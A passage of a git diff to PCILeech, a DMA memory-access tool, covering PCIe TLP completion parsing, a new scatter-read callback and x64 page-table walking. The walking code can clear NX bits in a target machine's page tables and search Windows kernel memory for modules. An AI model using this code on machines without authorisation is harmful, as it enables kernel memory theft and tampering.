-			"\n%s: %s Len: %03x ReqID: %04x BE_FL: %01x%01x Tag: %02x Addr: %08x", 
-			(isTx ? "TX" : "RX"),
-			(hdr->TypeFmt == TLP_MRd32) ? "MRd32: " : "MWr32: ", 
-			hdr->Length,
-			hdrM32->RequesterID, 
-			hdrM32->FirstBE, 
-			hdrM32->LastBE, 
-			hdrM32->Tag, 
-			hdrM32->Address);
-	} else if((hdr->TypeFmt == TLP_MRd64) || (hdr->TypeFmt == TLP_MWr64)) {
-		hdrM64 = (PTLP_HDR_MRdWr64)pb;
-		printf(
-			"\n%s: %s Len: %03x ReqID: %04x BE_FL: %01x%01x Tag: %02x Addr: %016llx",
-			(isTx ? "TX" : "RX"),
-			(hdr->TypeFmt == TLP_MRd64) ? "MRd64: " : "MWr64: ",
-			hdr->Length,
-			hdrM64->RequesterID,
-			hdrM64->FirstBE,
-			hdrM64->LastBE,
-			hdrM64->Tag,
-			((QWORD)hdrM64->AddressHigh << 32) + hdrM64->AddressLow
-		);
-	} else if((hdr->TypeFmt == TLP_IORd) || (hdr->TypeFmt == TLP_IOWr)) {
-		hdrM32 = (PTLP_HDR_MRdWr32)pb; // same format for IO Rd/Wr
-		printf(
-			"\n%s: %s Len: %03x ReqID: %04x BE_FL: %01x%01x Tag: %02x Addr: %08x",
-			(isTx ? "TX" : "RX"),
-			(hdr->TypeFmt == TLP_IORd) ? "IORd:  " : "IOWr:  ",
-			hdr->Length,
-			hdrM32->RequesterID,
-			hdrM32->FirstBE,
-			hdrM32->LastBE,
-			hdrM32->Tag,
-			hdrM32->Address
-		);
-	} else if((hdr->TypeFmt == TLP_CfgRd0) || (hdr->TypeFmt == TLP_CfgRd1) || (hdr->TypeFmt == TLP_CfgWr0) || (hdr->TypeFmt == TLP_CfgWr1)) {
-		if(hdr->TypeFmt == TLP_CfgRd0) { tp = "CfgRd0:"; }
-		if(hdr->TypeFmt == TLP_CfgRd1) { tp = "CfgRd1:"; }
-		if(hdr->TypeFmt == TLP_CfgWr0) { tp = "CfgWr0:"; }
-		if(hdr->TypeFmt == TLP_CfgWr1) { tp = "CfgWr1:"; }
-		hdrCfg = (PTLP_HDR_Cfg)pb;
-		printf(
-			"\n%s: %s Len: %03x ReqID: %04x BE_FL: %01x%01x Tag: %02x Dev: %i:%i.%i ExtRegNum: %01x RegNum: %02x",
-			(isTx ? "TX" : "RX"),
-			tp,
-			hdr->Length,
-			hdrCfg->RequesterID,
-			hdrCfg->FirstBE,
-			hdrCfg->LastBE,
-			hdrCfg->Tag,
-			hdrCfg->BusNum,
-			hdrCfg->DeviceNum,
-			hdrCfg->FunctionNum,
-			hdrCfg->ExtRegNum,
-			hdrCfg->RegNum			
-		);
-	} else { 
-		printf(
-			"\n%s: TLP???: TypeFmt: %02x dwLen: %03x", 
-			(isTx ? "TX" : "RX"), 
-			hdr->TypeFmt, 
-			hdr->Length
-		);
-	}
-	printf("\n");
-	Util_PrintHexAscii(pbTlp, cbTlp, 0);
+    DWORD i;
+    LPSTR tp = "";
+    BYTE pb[0x1000];
+    PDWORD buf = (PDWORD)pb;
+    PTLP_HDR hdr = (PTLP_HDR)pb;
+    PTLP_HDR_CplD hdrC;
+    PTLP_HDR_MRdWr32 hdrM32;
+    PTLP_HDR_MRdWr64 hdrM64;
+    PTLP_HDR_Cfg hdrCfg;
+    if(cbTlp < 12 || cbTlp > 0x1000 || cbTlp & 0x3) { return; }
+    for(i = 0; i < cbTlp; i += 4) {
+        buf[i >> 2] = _byteswap_ulong(*(PDWORD)(pbTlp + i));
+    }
+    if((hdr->TypeFmt == TLP_Cpl) || (hdr->TypeFmt == TLP_CplD) || (hdr->TypeFmt == TLP_CplLk) || (hdr->TypeFmt == TLP_CplDLk)) {
+        if(hdr->TypeFmt == TLP_Cpl)    { tp = "Cpl:   "; }
+        if(hdr->TypeFmt == TLP_CplD)   { tp = "CplD:  "; }
+        if(hdr->TypeFmt == TLP_CplLk)  { tp = "CplLk: "; }
+        if(hdr->TypeFmt == TLP_CplDLk) { tp = "CplDLk:"; }
+        hdrC = (PTLP_HDR_CplD)pb;
+        printf(
+            "\n%s: %s Len: %03x ReqID: %04x CplID: %04x Status: %01x BC: %03x Tag: %02x LowAddr: %02x",
+            (isTx ? "TX" : "RX"),
+            tp,
+            hdr->Length,
+            hdrC->RequesterID,
+            hdrC->CompleterID,
+            hdrC->Status,
+            hdrC->ByteCount,
+            hdrC->Tag,
+            hdrC->LowerAddress
+        );
+    } else if((hdr->TypeFmt == TLP_MRd32) || (hdr->TypeFmt == TLP_MWr32)) {
+        hdrM32 = (PTLP_HDR_MRdWr32)pb;
+        printf(
+            "\n%s: %s Len: %03x ReqID: %04x BE_FL: %01x%01x Tag: %02x Addr: %08x", 
+            (isTx ? "TX" : "RX"),
+            (hdr->TypeFmt == TLP_MRd32) ? "MRd32: " : "MWr32: ", 
+            hdr->Length,
+            hdrM32->RequesterID, 
+            hdrM32->FirstBE, 
+            hdrM32->LastBE, 
+            hdrM32->Tag, 
+            hdrM32->Address);
+    } else if((hdr->TypeFmt == TLP_MRd64) || (hdr->TypeFmt == TLP_MWr64)) {
+        hdrM64 = (PTLP_HDR_MRdWr64)pb;
+        printf(
+            "\n%s: %s Len: %03x ReqID: %04x BE_FL: %01x%01x Tag: %02x Addr: %016llx",
+            (isTx ? "TX" : "RX"),
+            (hdr->TypeFmt == TLP_MRd64) ? "MRd64: " : "MWr64: ",
+            hdr->Length,
+            hdrM64->RequesterID,
+            hdrM64->FirstBE,
+            hdrM64->LastBE,
+            hdrM64->Tag,
+            ((QWORD)hdrM64->AddressHigh << 32) + hdrM64->AddressLow
+        );
+    } else if((hdr->TypeFmt == TLP_IORd) || (hdr->TypeFmt == TLP_IOWr)) {
+        hdrM32 = (PTLP_HDR_MRdWr32)pb; // same format for IO Rd/Wr
+        printf(
+            "\n%s: %s Len: %03x ReqID: %04x BE_FL: %01x%01x Tag: %02x Addr: %08x",
+            (isTx ? "TX" : "RX"),
+            (hdr->TypeFmt == TLP_IORd) ? "IORd:  " : "IOWr:  ",
+            hdr->Length,
+            hdrM32->RequesterID,
+            hdrM32->FirstBE,
+            hdrM32->LastBE,
+            hdrM32->Tag,
+            hdrM32->Address
+        );
+    } else if((hdr->TypeFmt == TLP_CfgRd0) || (hdr->TypeFmt == TLP_CfgRd1) || (hdr->TypeFmt == TLP_CfgWr0) || (hdr->TypeFmt == TLP_CfgWr1)) {
+        if(hdr->TypeFmt == TLP_CfgRd0) { tp = "CfgRd0:"; }
+        if(hdr->TypeFmt == TLP_CfgRd1) { tp = "CfgRd1:"; }
+        if(hdr->TypeFmt == TLP_CfgWr0) { tp = "CfgWr0:"; }
+        if(hdr->TypeFmt == TLP_CfgWr1) { tp = "CfgWr1:"; }
+        hdrCfg = (PTLP_HDR_Cfg)pb;
+        printf(
+            "\n%s: %s Len: %03x ReqID: %04x BE_FL: %01x%01x Tag: %02x Dev: %i:%i.%i ExtRegNum: %01x RegNum: %02x",
+            (isTx ? "TX" : "RX"),
+            tp,
+            hdr->Length,
+            hdrCfg->RequesterID,
+            hdrCfg->FirstBE,
+            hdrCfg->LastBE,
+            hdrCfg->Tag,
+            hdrCfg->BusNum,
+            hdrCfg->DeviceNum,
+            hdrCfg->FunctionNum,
+            hdrCfg->ExtRegNum,
+            hdrCfg->RegNum            
+        );
+    } else { 
+        printf(
+            "\n%s: TLP???: TypeFmt: %02x dwLen: %03x", 
+            (isTx ? "TX" : "RX"), 
+            hdr->TypeFmt, 
+            hdr->Length
+        );
+    }
+    printf("\n");
+    Util_PrintHexAscii(pbTlp, cbTlp, 0);
 }
 
-BOOL TLP_CallbackMRd(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMRd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted)
+VOID TLP_CallbackMRd(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMRd, _In_ PBYTE pb, _In_ DWORD cb)
 {
-	PTLP_HDR_CplD hdrC = (PTLP_HDR_CplD)pb;
-	PTLP_HDR hdr = (PTLP_HDR)pb;
-	PDWORD buf = (PDWORD)pb;
-	DWORD o, c;
-	buf[0] = _byteswap_ulong(buf[0]);
-	if(cb < ((DWORD)hdr->Length << 2) - 12) { return FALSE; }
-	if((hdr->TypeFmt == TLP_CplD) && pBufferMRd) {
-		buf[1] = _byteswap_ulong(buf[1]);
-		buf[2] = _byteswap_ulong(buf[2]);
-		// NB! read algorithm below only support reading full 4kB pages _or_
-		//     partial page if starting at page boundry and read is less than 4kB.
-		o = ((DWORD)hdrC->Tag << 12) + min(0x1000, pBufferMRd->cbMax) - (hdrC->ByteCount ? hdrC->ByteCount : 0x1000);
-		c = (DWORD)hdr->Length << 2;
-		if(cb != c + 12) { return FALSE; }
-		if(o + c <= pBufferMRd->cbMax) {
-			memcpy(pBufferMRd->pb + o, pb + 12, c);
-			if(pBufferMRd->cbMax <= (DWORD)InterlockedAdd(&pBufferMRd->cb, c)) {
-				if(hEventCompleted) {
-					SetEvent(hEventCompleted);
-				}
-				return TRUE;
-			}
-		}
-	}
-	return FALSE;
+    PTLP_HDR_CplD hdrC = (PTLP_HDR_CplD)pb;
+    PTLP_HDR hdr = (PTLP_HDR)pb;
+    PDWORD buf = (PDWORD)pb;
+    DWORD o, c;
+    buf[0] = _byteswap_ulong(buf[0]);
+    if(cb < ((DWORD)hdr->Length << 2) + 12) { return; }
+    if((hdr->TypeFmt == TLP_CplD) && pBufferMRd) {
+        buf[1] = _byteswap_ulong(buf[1]);
+        buf[2] = _byteswap_ulong(buf[2]);
+        // NB! read algorithm below only support reading full 4kB pages _or_
+        //     partial page if starting at page boundry and read is less than 4kB.
+        o = ((DWORD)hdrC->Tag << 12) + min(0x1000, pBufferMRd->cbMax) - (hdrC->ByteCount ? hdrC->ByteCount : 0x1000);
+        c = (DWORD)hdr->Length << 2;
+        if(cb != c + 12) { return; }
+        if(o + c <= pBufferMRd->cbMax) {
+            memcpy(pBufferMRd->pb + o, pb + 12, c);
+            pBufferMRd->cb += c;
+        }
+    }
 }
 
-BOOL TLP_CallbackMRdProbe(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMRd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted)
+VOID TLP_CallbackMRdProbe(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMRd, _In_ PBYTE pb, _In_ DWORD cb)
 {
-	PTLP_HDR_CplD hdrC = (PTLP_HDR_CplD)pb;
-	PDWORD buf = (PDWORD)pb;
-	DWORD i;
-	if(cb < 16) { return FALSE; } // min size CplD = 16 bytes.
-	buf[0] = _byteswap_ulong(buf[0]);
-	buf[1] = _byteswap_ulong(buf[1]);
-	buf[2] = _byteswap_ulong(buf[2]);
-	if((hdrC->h.TypeFmt == TLP_CplD) && pBufferMRd) {
-		// 5 low address bits coded into the dword read, 8 high address bits coded into tag.
-		i = ((DWORD)hdrC->Tag << 5) + ((hdrC->LowerAddress >> 2) & 0x1f);
-		if(i < pBufferMRd->cbMax) {
-			pBufferMRd->pb[i] = 1;
-			if(pBufferMRd->cbMax <= (DWORD)InterlockedAdd(&pBufferMRd->cb, 1)) {
-				if(hEventCompleted) {
-					SetEvent(hEventCompleted);
-				}
-				return TRUE;
-			}
-		}
-	}
-	return FALSE;
+    PTLP_HDR_CplD hdrC = (PTLP_HDR_CplD)pb;
+    PDWORD buf = (PDWORD)pb;
+    DWORD i;
+    if(cb < 16) { return; } // min size CplD = 16 bytes.
+    buf[0] = _byteswap_ulong(buf[0]);
+    buf[1] = _byteswap_ulong(buf[1]);
+    buf[2] = _byteswap_ulong(buf[2]);
+    if((hdrC->h.TypeFmt == TLP_CplD) && pBufferMRd) {
+        // 5 low address bits coded into the dword read, 8 high address bits coded into tag.
+        i = ((DWORD)hdrC->Tag << 5) + ((hdrC->LowerAddress >> 2) & 0x1f);
+        if(i < pBufferMRd->cbMax) {
+            pBufferMRd->pb[i] = 1;
+            pBufferMRd->cb++;
+        }
+    }
+}
+
+VOID TLP_CallbackMRd_Scatter(_Inout_ PTLP_CALLBACK_BUF_MRd_SCATTER pBufferMrd_Scatter, _In_ PBYTE pb, _In_ DWORD cb)
+{
+    PTLP_HDR_CplD hdrC = (PTLP_HDR_CplD)pb;
+    PTLP_HDR hdr = (PTLP_HDR)pb;
+    PDWORD buf = (PDWORD)pb;
+    DWORD o, c, i;
+    PDMA_IO_SCATTER_HEADER phResult;
+    buf[0] = _byteswap_ulong(buf[0]);
+    if(cb < ((DWORD)hdr->Length << 2) + 12) { return; }
+    if(hdr->TypeFmt == TLP_CplD) {
+        buf[1] = _byteswap_ulong(buf[1]);
+        buf[2] = _byteswap_ulong(buf[2]);
+        if(pBufferMrd_Scatter->bEccBit != (hdrC->Tag >> 7)) { return; } // ECC bit mismatch
+        if(hdrC->Tag & 0x40) {
+            // Algoritm: Multiple MRd of size 128 bytes, MRd:CplD ratio 1:1.
+            i = (hdrC->Tag & 0x20) ? 1 : 0;
+            if(i >= pBufferMrd_Scatter->cph) { return; }
+            phResult = *(pBufferMrd_Scatter->pph + i);
+            o = 0x80 + ((hdrC->Tag & 0x1f) << 7) - (hdrC->ByteCount ? hdrC->ByteCount : 0x80);
+            if(o > 0x1000) { return; }
+        } else {
+            // Algoritm: Single MRd of page (0x1000) or less, multiple CplD.
+            i = hdrC->Tag & 0x3f;
+            if(i >= pBufferMrd_Scatter->cph) { return; }
+            phResult = *(pBufferMrd_Scatter->pph + i);
+            o = phResult->cbMax - (hdrC->ByteCount ? hdrC->ByteCount : 0x1000);
+        }
+        c = (DWORD)hdr->Length << 2;
+        if(o + c > phResult->cbMax) { return; }
+        memcpy(phResult->pb + o, pb + 12, c);
+        phResult->cb += c;
+        pBufferMrd_Scatter->cbReadTotal += c;
+    }
 }
diff --git a/pcileech/tlp.h b/pcileech/tlp.h
index c2b35e7..46cfd3c 100644
--- a/pcileech/tlp.h
+++ b/pcileech/tlp.h
@@ -96,16 +96,30 @@ typedef struct tdTLP_CALLBACK_BUF_MRd {
 	PBYTE pb;
 } TLP_CALLBACK_BUF_MRd, *PTLP_CALLBACK_BUF_MRd;
 
+typedef struct tdTLP_CALLBACK_BUF_MRd_SCATTER {
+    PPDMA_IO_SCATTER_HEADER pph;  // pointer to pointer-table to DMA_READ_SCATTER_HEADERs.
+    DWORD cph;                      // entry count of pph array.
+    DWORD cbReadTotal;              // total bytes read.
+    BYTE bEccBit;                   // alternating bit (Tlp.Tag[7]) for ECC.
+} TLP_CALLBACK_BUF_MRd_SCATTER, *PTLP_CALLBACK_BUF_MRd_SCATTER;
+
 /*
 * Generic callback function that may be used by TLP capable devices to aid the
 * collection of memory read completions. Receives single TLP packet.
 * -- pBufferMrd
 * -- pb
 * -- cb
-* -- hEventCompleted = optional Event that will be signaled once all MRd's are completed.
-* -- return = TRUE if all required TLPs required to fill up buffer have been processed, otherwise FALSE.
 */
-BOOL TLP_CallbackMRd(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMrd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted);
+VOID TLP_CallbackMRd(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMrd, _In_ PBYTE pb, _In_ DWORD cb);
+
+/*
+* Generic callback function that may be used by TLP capable devices to aid the
+* collection of memory read completions. Receives single TLP packet.
+* -- pBufferMrd_2
+* -- pb
+* -- cb
+*/
+VOID TLP_CallbackMRd_Scatter(_Inout_ PTLP_CALLBACK_BUF_MRd_SCATTER pBufferMrd_Scatter, _In_ PBYTE pb, _In_ DWORD cb);
 
 /*
 * Generic callback function that may be used by TLP capable devices to aid the
@@ -113,9 +127,7 @@ BOOL TLP_CallbackMRd(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMrd, _In_ PBYTE pb, _I
 * -- pBufferMrd
 * -- pb
 * -- cb
-* -- hEventCompleted = optional Event that will be signaled once all MRd's are completed.
-* -- return = TRUE if all required TLPs required TLPs have been processed, otherwise FALSE.
 */
-BOOL TLP_CallbackMRdProbe(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMRd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted);
+VOID TLP_CallbackMRdProbe(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMRd, _In_ PBYTE pb, _In_ DWORD cb);
 
 #endif /* __TLP_H__ */
diff --git a/pcileech/util.c b/pcileech/util.c
index f110612..872ed38 100644
--- a/pcileech/util.c
+++ b/pcileech/util.c
@@ -1,6 +1,6 @@
 // util.c : implementation of various utility functions.
 //
-// (c) Ulf Frisk, 2016, 2017
+// (c) Ulf Frisk, 2016-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #include "pcileech.h"
@@ -8,695 +8,715 @@
 #include "device.h"
 #include "shellcode.h"
 
-#define PT_VALID_MASK		0x00000000000000BD	// valid, active, supervior paging structure
-#define PT_VALID_VALUE		0x0000000000000021	// 
-#define PT_MASK_ENABLE		0x0000000000000001
-#define PT_MASK_PS			0x0000000000000080
-#define PT_MASK_NX			0x8000000000000000
-#define PT_FLAG_HELPER_X	0x0000000000000001
+#define PT_VALID_MASK       0x00000000000000BD    // valid, active, supervior paging structure
+#define PT_VALID_VALUE      0x0000000000000021    //
+#define PT_MASK_ENABLE      0x0000000000000001
+#define PT_MASK_PS          0x0000000000000080
+#define PT_MASK_NX          0x8000000000000000
+#define PT_FLAG_HELPER_X    0x0000000000000001
 
 BOOL Util_PageTable_Helper(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwVA, _In_ QWORD qwPgLvl, _In_ QWORD qwPgTblPA, _In_ QWORD qwTestMask, _In_ QWORD qwTestValue, _In_ QWORD fMode, _Out_ PQWORD pqwPTE, _Out_opt_ PQWORD pqwPTEPA, _Out_ PQWORD pqwPgLvl)
 {
-	BOOL result;
-	BYTE pb[4096];
-	QWORD idx, pte;
-	result = DeviceReadMEM(ctx, qwPgTblPA, pb, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	if(!result) { return FALSE; }
-	idx = 0xff8 & ((qwVA >> (qwPgLvl * 9 + 3)) << 3);
-	pte = *(PQWORD)(pb + idx);
-	if(!(pte & PT_MASK_ENABLE)) { return FALSE; }
-	if((pte & qwTestMask) != qwTestValue) { return FALSE; }
-	if((fMode & PT_FLAG_HELPER_X) && (pte & PT_MASK_NX)) {
-		*(PQWORD)(pb + idx) &= 0x7fffffffffffffff;
-		DeviceWriteMEM(ctx, qwPgTblPA + idx, pb + idx, 8, 0);
-	}
-	if((qwPgLvl == 1) || (pte & PT_MASK_PS)) {
-		*pqwPgLvl = qwPgLvl;
-		*pqwPTE = pte;
-		*pqwPTEPA = qwPgTblPA + idx;
-		return TRUE;
-	}
-	qwPgTblPA = pte & 0x0000fffffffff000;
-	if(!qwPgTblPA) { return FALSE; }
-	return Util_PageTable_Helper(ctx, qwVA, qwPgLvl - 1, qwPgTblPA, qwTestMask, qwTestValue, fMode, pqwPTE, pqwPTEPA, pqwPgLvl);
+    BOOL result;
+    BYTE pb[4096];
+    QWORD idx, pte;
+    result = DeviceReadMEM(ctx, qwPgTblPA, pb, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    if(!result) { return FALSE; }
+    idx = 0xff8 & ((qwVA >> (qwPgLvl * 9 + 3)) << 3);
+    pte = *(PQWORD)(pb + idx);
+    if(!(pte & PT_MASK_ENABLE)) { return FALSE; }
+    if((pte & qwTestMask) != qwTestValue) { return FALSE; }
+    if((fMode & PT_FLAG_HELPER_X) && (pte & PT_MASK_NX)) {
+        *(PQWORD)(pb + idx) &= 0x7fffffffffffffff;
+        DeviceWriteMEM(ctx, qwPgTblPA + idx, pb + idx, 8, 0);
+    }
+    if((qwPgLvl == 1) || (pte & PT_MASK_PS)) {
+        *pqwPgLvl = qwPgLvl;
+        *pqwPTE = pte;
+        *pqwPTEPA = qwPgTblPA + idx;
+        return TRUE;
+    }
+    qwPgTblPA = pte & 0x0000fffffffff000;
+    if(!qwPgTblPA) { return FALSE; }
+    return Util_PageTable_Helper(ctx, qwVA, qwPgLvl - 1, qwPgTblPA, qwTestMask, qwTestValue, fMode, pqwPTE, pqwPTEPA, pqwPgLvl);
 }
 
 BOOL Util_PageTable_ReadPTE(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwCR3, _In_ QWORD qwAddressLinear, _Out_ PQWORD pqwPTE, _Out_ PQWORD pqPTEAddrPhys)
 {
-	QWORD ptePgLvl;
-	return Util_PageTable_Helper(ctx, qwAddressLinear, 4, qwCR3, PT_VALID_MASK, PT_VALID_VALUE, 0, pqwPTE, pqPTEAddrPhys, &ptePgLvl);
+    QWORD ptePgLvl;
+    return Util_PageTable_Helper(ctx, qwAddressLinear, 4, qwCR3, PT_VALID_MASK, PT_VALID_VALUE, 0, pqwPTE, pqPTEAddrPhys, &ptePgLvl);
 }
 
 BOOL Util_PageTable_SetMode(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwCR3, _In_ QWORD qwAddressLinear, _In_ BOOL fSetX)
 {
-	QWORD pte, pteVA, ptePgLvl;
-	return Util_PageTable_Helper(ctx, qwAddressLinear, 4, qwCR3, 0, 0, PT_FLAG_HELPER_X, &pte, &pteVA, &ptePgLvl);
+    QWORD pte, pteVA, ptePgLvl;
+    return Util_PageTable_Helper(ctx, qwAddressLinear, 4, qwCR3, 0, 0, PT_FLAG_HELPER_X, &pte, &pteVA, &ptePgLvl);
 }
 
 BOOL Util_PageTable_FindSignatureBase_IsPageTableDataValid(_In_ QWORD qwPageTableData)
 {
-	if((qwPageTableData & PT_VALID_MASK) != PT_VALID_VALUE) {
-		return FALSE; // Not valid supervisor page entry
-	}
-	qwPageTableData &= 0x0000fffffffff000;
-	if(qwPageTableData == 0) {
-		return FALSE; // Not found
-	}
-	if(qwPageTableData > 0xffffffff) {
-		return FALSE; // Outside 32-bit scope
-	}
-	if(qwPageTableData > 0xc0000000) {
-		return FALSE; // Possibly in PCIE space
-	}
-	return TRUE;
+    if((qwPageTableData & PT_VALID_MASK) != PT_VALID_VALUE) {
+        return FALSE; // Not valid supervisor page entry
+    }
+    qwPageTableData &= 0x0000fffffffff000;
+    if(qwPageTableData == 0) {
+        return FALSE; // Not found
+    }
+    if(qwPageTableData > 0xffffffff) {
+        return FALSE; // Outside 32-bit scope
+    }
+    if(qwPageTableData > 0xc0000000) {
+        return FALSE; // Possibly in PCIE space
+    }
+    return TRUE;
 }
 
 BOOL Util_PageTable_FindSignatureBase_CachedReadMEM(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE pbPage, _Inout_updates_bytes_(0x01000000) PBYTE pbCache)
 {
-	BOOL result;
-	if(pbCache) {
-		if(*(PQWORD)pbCache == 0) {
-			*(PQWORD)pbCache = 2;
-			result = DeviceReadMEM(ctx, 0x00100000, pbCache + 0x00100000, 0x00F00000, PCILEECH_MEM_FLAG_RETRYONFAIL);
-			if(!result) { return FALSE; }
-			*(PQWORD)pbCache = 1;
-		}
-		if(*(PQWORD)pbCache == 1 && qwAddr >= 0x00100000 && qwAddr < 0x01000000) {
-			memcpy(pbPage, pbCache + qwAddr, 4096);
-			return TRUE;
-		}
-	}
-	return DeviceReadMEM(ctx, qwAddr, pbPage, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    BOOL result;
+    if(pbCache) {
+        if(*(PQWORD)pbCache == 0) {
+            *(PQWORD)pbCache = 2;
+            result = DeviceReadMEM(ctx, 0x00100000, pbCache + 0x00100000, 0x00F00000, PCILEECH_MEM_FLAG_RETRYONFAIL);
+            if(!result) { return FALSE; }
+            *(PQWORD)pbCache = 1;
+        }
+        if(*(PQWORD)pbCache == 1 && qwAddr >= 0x00100000 && qwAddr < 0x01000000) {
+            memcpy(pbPage, pbCache + qwAddr, 4096);
+            return TRUE;
+        }
+    }
+    return DeviceReadMEM(ctx, qwAddr, pbPage, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL);
 }
 
 BOOL Util_PageTable_FindSignatureBase_Search(_Inout_ PPCILEECH_CONTEXT ctx, _Inout_ PBYTE pbCache, _In_ QWORD qwCR3, _In_ PSIGNATUREPTE pPTEs, _In_ QWORD cPTEs, _Out_ PQWORD pqwSignatureBase)
 {
-	// win8  kernel modules start at even  1-page boundaries (0x1000)
-	// win10 kernel modules start at even 16-page boundaries (0x10000)
-	// winx64 kernel memory is located above 0xfffff80000000000
-	BOOL result;
-	QWORD PML4[512], PDPT[512], PD[512], PT[512];
-	QWORD PML4_idx = 0xfff, PDPT_idx = 0xfff, PD_idx = 0xfff;
-	PSIGNATUREPTE pPTE = pPTEs;
-	QWORD cPTE = 0, cPTEPages = 0, PTE, qwA;
-	QWORD qwPageTableData;
-	WORD wSignature;
-	result = Util_PageTable_FindSignatureBase_CachedReadMEM(ctx, qwCR3 & 0x0000fffffffff000, (PBYTE)PML4, pbCache);
-	if(!result) { return FALSE; }
-	qwA = 0x0fffff80000000000;
-	while(qwA > 0x07fffffffffffffff) {
-		if(PML4_idx != (0x1ff & (qwA >> 39))) { // PML4
-			PML4_idx = 0x1ff & (qwA >> 39);
-			qwPageTableData = PML4[PML4_idx];
-			if(!Util_PageTable_FindSignatureBase_IsPageTableDataValid(qwPageTableData)) {
-				qwA += 0x0000008000000000;
-				qwA &= 0xffffff8000000000;
-				continue;
-			}
-			result = Util_PageTable_FindSignatureBase_CachedReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PDPT, pbCache);
-			if(!result) {
-				qwA += 0x0000008000000000;
-				qwA &= 0xffffff8000000000;
-				continue;
-			}
-			PDPT_idx = 0xfff;
-			PD_idx = 0xfff;
-		}
-		if(PDPT_idx != (0x1ff & (qwA >> 30))) { // PDPT(Page-Directory Pointer Table)
-			PDPT_idx = 0x1ff & (qwA >> 30);
-			qwPageTableData = PDPT[PDPT_idx];
-			if(!Util_PageTable_FindSignatureBase_IsPageTableDataValid(qwPageTableData)) {
-				qwA += 0x0000000040000000;
-				qwA &= 0xffffffffC0000000;
-				continue;
-			}
-			result = Util_PageTable_FindSignatureBase_CachedReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PD, pbCache);
-			if(!result) {
-				qwA += 0x0000000040000000;
-				qwA &= 0xffffffffC0000000;
-				continue;
-			}
-			PD_idx = 0xfff;
-		}
-		if(PD_idx != (0x1ff & (qwA >> 21))) { // PD (Page Directory)
-			PD_idx = 0x1ff & (qwA >> 21);
-			qwPageTableData = PD[PD_idx];
-			if(!Util_PageTable_FindSignatureBase_IsPageTableDataValid(qwPageTableData)) {
-				qwA += 0x0000000000200000;
-				qwA &= 0xffffffffffE00000;
-				continue;
-			}
-			result = Util_PageTable_FindSignatureBase_CachedReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PT, pbCache);
-			if(!result) {
-				qwA += 0x0000000000200000;
-				qwA &= 0xffffffffffE00000;
-				continue;
-			}
-		}
-		PTE = PT[0x1ff & (qwA >> 12)];
-		wSignature = (PTE & 0x07) | ((PTE >> 48) & 0x8000);
-		if(wSignature != pPTE->wSignature) { // signature do not match
-			qwA += 0x0000000000001000;
-			qwA &= 0xfffffffffffff000;
-			pPTE = pPTEs;
-			cPTE = 0;
-			cPTEPages = 0;
-			continue;
-		}
-		if(cPTE == 0 && cPTEPages == 0) {
-			*pqwSignatureBase = qwA;
-		}
-		cPTEPages++;
-		if(cPTEPages == pPTE->cPages) { // next page section
-			cPTE++;
-			pPTE = pPTEs + cPTE;
-			cPTEPages = 0;
-			if(pPTE->cPages == 0 || cPTE == cPTEs) { // found
-				return TRUE;
-			}
-		}
-		qwA += 0x1000;
-	}
-	*pqwSignatureBase = 0;
-	return FALSE;
+    // win8  kernel modules start at even  1-page boundaries (0x1000)
+    // win10 kernel modules start at even 16-page boundaries (0x10000)
+    // winx64 kernel memory is located above 0xfffff80000000000
+    BOOL result;
+    QWORD PML4[512], PDPT[512], PD[512], PT[512];
+    QWORD PML4_idx = 0xfff, PDPT_idx = 0xfff, PD_idx = 0xfff;
+    PSIGNATUREPTE pPTE = pPTEs;
+    QWORD cPTE = 0, cPTEPages = 0, PTE, qwA;
+    QWORD qwPageTableData;
+    WORD wSignature;
+    result = Util_PageTable_FindSignatureBase_CachedReadMEM(ctx, qwCR3 & 0x0000fffffffff000, (PBYTE)PML4, pbCache);
+    if(!result) { return FALSE; }
+    qwA = 0x0fffff80000000000;
+    while(qwA > 0x07fffffffffffffff) {
+        if(PML4_idx != (0x1ff & (qwA >> 39))) { // PML4
+            PML4_idx = 0x1ff & (qwA >> 39);
+            qwPageTableData = PML4[PML4_idx];
+            if(!Util_PageTable_FindSignatureBase_IsPageTableDataValid(qwPageTableData)) {
+                qwA += 0x0000008000000000;
+                qwA &= 0xffffff8000000000;
+                continue;
+            }
+            result = Util_PageTable_FindSignatureBase_CachedReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PDPT, pbCache);
+            if(!result) {
+                qwA += 0x0000008000000000;
+                qwA &= 0xffffff8000000000;
+                continue;
+            }
+            PDPT_idx = 0xfff;
+            PD_idx = 0xfff;
+        }
+        if(PDPT_idx != (0x1ff & (qwA >> 30))) { // PDPT(Page-Directory Pointer Table)
+            PDPT_idx = 0x1ff & (qwA >> 30);
+            qwPageTableData = PDPT[PDPT_idx];
+            if(!Util_PageTable_FindSignatureBase_IsPageTableDataValid(qwPageTableData)) {
+                qwA += 0x0000000040000000;
+                qwA &= 0xffffffffC0000000;
+                continue;
+            }
+            result = Util_PageTable_FindSignatureBase_CachedReadMEM(ctx, qwPageTableData & 0x0000fffffffff000, (PBYTE)PD, pbCache);
